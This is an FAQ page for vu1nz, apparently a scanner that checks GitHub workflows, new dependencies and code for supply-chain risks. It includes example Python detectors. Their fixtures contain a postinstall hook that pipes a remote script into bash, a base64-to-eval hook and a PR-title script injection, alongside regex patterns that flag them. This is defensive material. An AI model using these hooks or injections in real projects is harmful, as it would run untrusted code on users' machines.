FAQ

Frequently asked questions.

Can't find what you're looking for? Email us.

Getting started

How long does it take to set up?
About 30 seconds. Click Install on the GitHub App page, select which repos to protect, and you're done. No workflow files, no secrets to manage. Every PR in those repos is now scanned automatically.
Do I need to add a YAML file to every repo?
No — that's the whole point of the GitHub App. Install once on your org and every repo is covered, including repos you create in the future. If you prefer the workflow-file approach, a 6-line YAML snippet is available on the Docs page.
Does it work on private repos?
Yes. The GitHub App uses a scoped installation token to read workflow files in private repos. No extra permissions are required.
Does it work for personal GitHub accounts (not orgs)?
Yes. A personal account counts as one "org" for billing purposes.

What it scans

What does the CI/CD scanner check?
17 deterministic checks mapped to CWE: script injection via PR title/body/head ref, unpinned third-party actions (tag vs SHA), secrets interpolated directly into run: commands, pull_request_target misuse granting write access to untrusted code, overly permissive permissions blocks, and more.
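As an added illustration (not the vu1nz scanner's own code), here is a minimal line-oriented check for three of the classes named above: unpinned third-party actions, untrusted event fields or secrets expanded inside `run:` commands, and a write-all token on a `pull_request_target` workflow. The workflow text is constructed for the example.

```python
import re

# Constructed sample workflow (not from vu1nz) exhibiting the check classes named above.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request_target]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: some-org/setup-tool@a1b2c3d4e5f60718293a4b5c6d7e8f9012345678
      - uses: some-org/lint-action@v2
      - run: echo "Title: ${{ github.event.pull_request.title }}"
      - run: curl -H "Authorization: ${{ secrets.API_TOKEN }}" https://example.invalid
"""

# Event fields an external contributor controls (PR title/body/head ref, issue and comment text).
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.event\.(pull_request\.(title|body|head\.ref)"
    r"|issue\.(title|body)|comment\.body)\s*\}\}")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
FIRST_PARTY = ("actions/", "github/")   # GitHub-maintained actions; tag pinning tolerated here

def scan_workflow(text: str) -> list[tuple[str, str]]:
    """Return (check_id, detail) findings for the raw YAML of one workflow file.
    Line-oriented on purpose: `run: |` block scalars are not walked in this example."""
    findings = []
    for m in re.finditer(r"^[ \t]*-?[ \t]*uses:[ \t]*([^\s#]+)", text, re.M):
        ref = m.group(1)
        if "@" not in ref or ref.startswith("./"):
            continue                                  # local action, nothing to pin
        action, _, version = ref.rpartition("@")
        if not action.startswith(FIRST_PARTY) and not FULL_SHA.match(version):
            findings.append(("unpinned-action", f"{action} at '{version}' is a tag, not a commit SHA"))
    for m in re.finditer(r"^[ \t]*-?[ \t]*run:[ \t]*(.+)$", text, re.M):
        cmd = m.group(1).strip()
        if UNTRUSTED.search(cmd):                     # expression is expanded into the shell script
            findings.append(("script-injection", cmd))
        if "${{ secrets." in cmd:                     # secret written straight into the command line
            findings.append(("secret-in-run", cmd))
    if (re.search(r"^on:.*pull_request_target", text, re.M)
            and re.search(r"^permissions:[ \t]*write-all", text, re.M)):
        findings.append(("pull_request_target-write",
                         "write-all token on a pull_request_target workflow"))
    return findings
```

The fix for each finding is the one the checks imply: pin to a full commit SHA, pass untrusted values through an `env:` variable instead of interpolating them, and scope `permissions:` to what the job needs.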
What does the package scanner check?
When a PR adds a new package dependency (npm, pip, cargo, gem, go.mod, composer), vu1nz checks it against OSV.dev's real-time malware feed, runs a typosquat-distance check against the top 5k packages per ecosystem, inspects install scripts for curl-bash/base64-eval patterns, and flags packages published in the last 7 days from low-reputation maintainers.
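As an added example (not vu1nz's implementation), the two signals above that can be computed offline: an edit-distance typosquat check against a popular-package list, and the curl-bash / base64-eval patterns in npm install hooks. The popular-name set and the package.json are constructed for the example; the real check uses the top 5k names per ecosystem.

```python
import re

# Constructed stand-in for the per-ecosystem "top packages" list.
POPULAR_NPM = {"express", "lodash", "react", "axios", "chalk", "commander", "moment"}

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: the number of single-character edits turning a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def typosquat_candidates(name: str, popular: set[str], max_dist: int = 2) -> list[str]:
    """Popular names within max_dist edits of `name`, excluding an exact match."""
    return sorted(p for p in popular if p != name and edit_distance(name, p) <= max_dist)

# Install-hook patterns named above: a download piped into a shell, and base64 decoded into eval.
INSTALL_SCRIPT_PATTERNS = {
    "curl-bash": re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64-eval": re.compile(r"base64\s+(-d|--decode)[^|;\n]*\|\s*(eval|sh|bash)\b"
                              r"|eval\s*\(.*(atob\(|base64)"),
}

def suspicious_install_hooks(pkg_json: dict) -> list[str]:
    """Label npm lifecycle scripts that match an install-script risk pattern."""
    hits = []
    scripts = pkg_json.get("scripts", {})
    for hook in ("preinstall", "install", "postinstall"):
        for label, pat in INSTALL_SCRIPT_PATTERNS.items():
            if pat.search(scripts.get(hook, "")):
                hits.append(f"{hook}:{label}")
    return hits

# Constructed package.json for a package a PR might add (name one edit away from "express").
SAMPLE_PKG = {
    "name": "expres",
    "scripts": {
        "postinstall": "curl -s https://example.invalid/s.sh | bash",
        "install": "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\"",
    },
}
```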
What does the code (SAST) scanner check?
60+ checks across 12 categories: hardcoded secrets and API keys, SQL/command/LDAP injection, reflected and stored XSS, insecure auth patterns, broken crypto (MD5, SHA-1, ECB mode), deserialisation, SSRF, path traversal, open redirects, XXE, misconfigured frameworks, and sensitive data leakage.
Will it slow down my CI?
No. The deterministic scanners complete in under 5 seconds. The optional Claude AI review takes under a minute. Scans run in parallel with your existing jobs.
What gets sent to Claude?
Only the workflow YAML files and changed code snippets flagged by the deterministic scanners. No secrets, no environment variables, no source files unrelated to the findings. Claude review is entirely opt-in via your own Anthropic API key.

Comparisons

How does it compare to Dependabot?
Dependabot scans your existing dependencies for known CVEs. vu1nz scans new packages added in a PR diff — including packages that have no CVE yet but show malware signals — and scans your workflow files, which Dependabot doesn't touch at all.
How does it compare to GitHub CodeQL?
CodeQL scans your application source code. vu1nz scans the workflow YAML files that run your CI/CD and the new packages that enter your supply chain via PR — the two surfaces that every major breach since 2022 has exploited.
How does it compare to Snyk?
Snyk is a CVE database lookup plus some SAST. vu1nz focuses specifically on the supply-chain attack surface: CI/CD workflow misconfigurations and malicious new packages that have no CVE yet.

Compliance

Which compliance frameworks does vu1nz support?
vu1nz findings map directly to OWASP CI/CD Top 10, NIST SSDF (SP 800-218), SLSA supply-chain levels, and CWE. Every finding includes a CWE identifier so it can be referenced in audit evidence. The CI/CD checks cover the specific control categories auditors look for under SOC 2 CC7/CC8 (change management and risk mitigation) and PCI DSS 4.0 Requirement 6.3 (protecting web-facing apps and software supply chain).
Does vu1nz help with SOC 2?
Yes — indirectly. SOC 2 Type II requires evidence of controls around change management (CC8) and risk assessment (CC7). Automated PR-level scanning with a documented finding history is exactly the kind of continuous control evidence auditors want. Your scan history in the dashboard is exportable and can be referenced in your SOC 2 audit package.
Does it help with NIST SSDF or SLSA?
Yes. NIST SSDF (SP 800-218) explicitly calls for verifying third-party components (PW.4) and protecting the build environment (PO.5). vu1nz addresses both: the package scanner covers PW.4 (malware, typosquats, install-script risks) and the CI/CD scanner covers PO.5 (unpinned actions, script injection, overly permissive workflow tokens). SLSA Level 2+ requires pinned, verified build dependencies — our unpinned-action check flags exactly those gaps.
Does it help with PCI DSS 4.0?
Req 6.3.2 (inventory of bespoke and custom software) and 6.3.3 (all software protected from known vulnerabilities) are directly relevant. The SAST scanner covers 6.3.2/6.3.3 by catching injection, XSS, and insecure crypto in code. The package scanner covers the supply-chain angle of 6.3.3 — flagging malicious or vulnerable new dependencies before they reach a cardholder data environment.
Does it address OWASP CI/CD Top 10?
All 10 categories are covered. CICD-SEC-1 (insufficient flow control) and CICD-SEC-3 (dependency chain abuse) are the highest-value checks — both are in the default scan. Findings include the OWASP category reference alongside the CWE so you can cross-reference your security posture report directly.
Can I export scan results for an audit?
Yes. Every scan is saved to your dashboard history with full finding detail, timestamps, repo, PR number, and severity breakdown. Contact sales@vu1nz.com for bulk CSV export or webhook-to-SIEM integration on the enterprise plan.
Does vu1nz store my source code?
No. The GitHub App reads workflow YAML files and PR diffs via the GitHub API during a scan and does not persist source code. Only the scan results (findings, severity counts, repo name, timestamp) are stored in your dashboard. See our privacy contact at sales@vu1nz.com for a data processing agreement (DPA) if required by your compliance programme.

Billing & account

Is there a free trial?
Yes. 14 days per GitHub org, no credit card required.
How much does it cost after the trial?
$100/month per GitHub org, flat. One team of 200 engineers with 50 repos costs the same as a team of 5 with 2 repos.
What payment methods are accepted?
Credit/debit card or crypto via CoinPay. Email sales@vu1nz.com for annual invoicing.
Can I cancel anytime?
Yes. Cancel before your next billing date and you won't be charged again. Your scans keep running for the remainder of the paid period.
Is the CLI free?
The vu1nz CLI scanner is MIT-licensed and free forever. You can run it locally, in your own CI, or self-host it. The GitHub App, hosted dashboard, and scan history are the paid parts.